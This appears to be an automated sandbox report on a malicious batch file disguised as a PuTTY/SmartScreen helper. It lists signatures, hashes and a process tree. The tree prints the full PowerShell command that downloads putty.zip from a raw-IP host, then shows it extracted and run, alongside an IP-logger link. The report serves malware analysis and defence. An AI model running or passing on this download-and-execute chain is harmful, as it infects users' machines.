Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31/05/2024, 19:39

General

  • Target

    $TEMP/putty/Smartscreen.bat

  • Size

    238B

  • MD5

    f6423b02fa9b2de5b162826b26c0dc56

  • SHA1

    01e7e79e6018c629ca11bc30f15a1a3e6988773e

  • SHA256

    59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83

  • SHA512

    5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://94.103.188.126/jerry/putty.zip

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$TEMP\putty\Smartscreen.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
      2⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb314046f8,0x7ffb31404708,0x7ffb31404718
        3⤵
          PID:3604
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
          3⤵
            PID:408
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4584
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
            3⤵
              PID:4916
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
              3⤵
                PID:4840
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                3⤵
                  PID:4812
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
                  3⤵
                    PID:1956
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
                    3⤵
                      PID:2164
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3208
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                      3⤵
                        PID:2392
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                        3⤵
                          PID:4604
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                          3⤵
                            PID:1920
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
                            3⤵
                              PID:3628
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3503937268049028796,9950985732017280834,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6088
                          • C:\Windows\system32\tar.exe
                            tar -xf putty.zip
                            2⤵
                              PID:3628
                            • C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
                              C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
                              2⤵
                              • Executes dropped EXE
                              PID:436
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2312
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4432

                              Network

                              MITRE ATT&CK Enterprise v15

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                Filesize

                                152B

                                MD5

                                f53207a5ca2ef5c7e976cbb3cb26d870

                                SHA1

                                49a8cc44f53da77bb3dfb36fc7676ed54675db43

                                SHA256

                                19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23

                                SHA512

                                be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                Filesize

                                152B

                                MD5

                                ae54e9db2e89f2c54da8cc0bfcbd26bd

                                SHA1

                                a88af6c673609ecbc51a1a60dfbc8577830d2b5d

                                SHA256

                                5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af

                                SHA512

                                e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                Filesize

                                336B

                                MD5

                                245245fd78d9215c0e4c8b06c6d5910b

                                SHA1

                                4721e0cb2093c97b18dd63d061e92ee8fac19390

                                SHA256

                                6188a53c56d8e84a187cb3095b65def5691f54fd78571f07b60167fb0db6d3e2

                                SHA512

                                5e78277bdfd1bb477463abea5631b5aef608f03cbe032ecf02ff5f472d5ed9ab8b2651b8f7c2c378772026a41f104325e98dd878bfbecfeeee856deef5b19de1

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                Filesize

                                1KB

                                MD5

                                09604eb4cbb0080631664d11a892ea0b

                                SHA1

                                178f12424e27e1ea73856393e132dc063250febc

                                SHA256

                                5698f2871f10ef1adf97ac0eab894f9815bc1083645baf71ae2d5e7d9e7699f4

                                SHA512

                                1e7a5564122e89bb3bcf2774662b9695f90763ba200e0c6825f902ffc3bd5149b9176bb8090c69323e0782d1c53c77829485c3262d09ebdba24331833c6bf649

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                Filesize

                                1KB

                                MD5

                                86038c66a1de63d6e61197f1e4f30e28

                                SHA1

                                d576c10287f707af83ec605a10786662be32575d

                                SHA256

                                7ecd92e49b7be7c761cbf12170bf9492ed17d79ad7035d35aba05e4bc00db612

                                SHA512

                                d70280007e848230a278722098b73f9935224447c84ea1e2abb39fda252366b5b8d03d74179da43c757d34d75969696a1271caa3db7b6ee7c2edb945ccfdea7d

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                Filesize

                                5KB

                                MD5

                                f980b2ff094b696d35d3ffc4614923e4

                                SHA1

                                40198f36e3aa647d31adb14bbd0f6b9d9ae88755

                                SHA256

                                76e5924ab35f23dcde767847a97db1fea9695a9dc9aafbebeb3210c7ab540663

                                SHA512

                                26ad2be9984b435a06d3461e0b013092a3b9bc4bdd7df05a47a2724f421944da77c77aefef8efb0b06c7f3baa98cc79e16994549590accaa8b6f925e4c95637d

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                Filesize

                                6KB

                                MD5

                                f7b18ef92ecff70425868606e122847c

                                SHA1

                                5475a40a2be7f622db8539e17e36335ba976d2ad

                                SHA256

                                28bfe7b574a904db30a06a288074f4217afe0a76c0d5030aa795bab25c9e6fba

                                SHA512

                                07b055d8a25bfecb40926c074486cc53b604d17ca653a1752c4811dfae36c7e50355be211286192553643c5293a6aa5cde0b6ee18d2460efab1c0966df6d1181

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                Filesize

                                16B

                                MD5

                                6752a1d65b201c13b62ea44016eb221f

                                SHA1

                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                SHA256

                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                SHA512

                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c0cea32a-2e76-4a82-b7f8-ea08abd4ef6c.tmp

                                Filesize

                                10KB

                                MD5

                                1dbc2b46c1824f8ba45b11210b6adf88

                                SHA1

                                6fcf4d3416d8357a96b08ae8fa1515b6537cce9d

                                SHA256

                                0c855556b290287af3855514fda51efe41729d14be29da4be91b8a53e01d0528

                                SHA512

                                89e776336afaf5b6a947e71c746fe760afaaf6fad2aae39b4887a3da1df94e64c4f9f12203d120bbbfb9d6dffbf9b9d73bd244845c8422468737988cff1b2f3e

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nd2bjy3r.fer.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\putty.zip

                                Filesize

                                933KB

                                MD5

                                188fbf5c7b5748e1f750be2bab44e0a0

                                SHA1

                                525afccfc532830f71f068acfbf9ac49a1463539

                                SHA256

                                14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370

                                SHA512

                                62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

                              • C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

                                Filesize

                                1.6MB

                                MD5

                                7a9a33206f80078ba80f7a839cd92451

                                SHA1

                                55447378c48561c35bad1317b58a34ee50c5072f

                                SHA256

                                e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486

                                SHA512

                                61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

                              • memory/2916-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp

                                Filesize

                                8KB

                              • memory/2916-16-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2916-12-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2916-11-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2916-6-0x000001F2E31D0000-0x000001F2E31F2000-memory.dmp

                                Filesize

                                136KB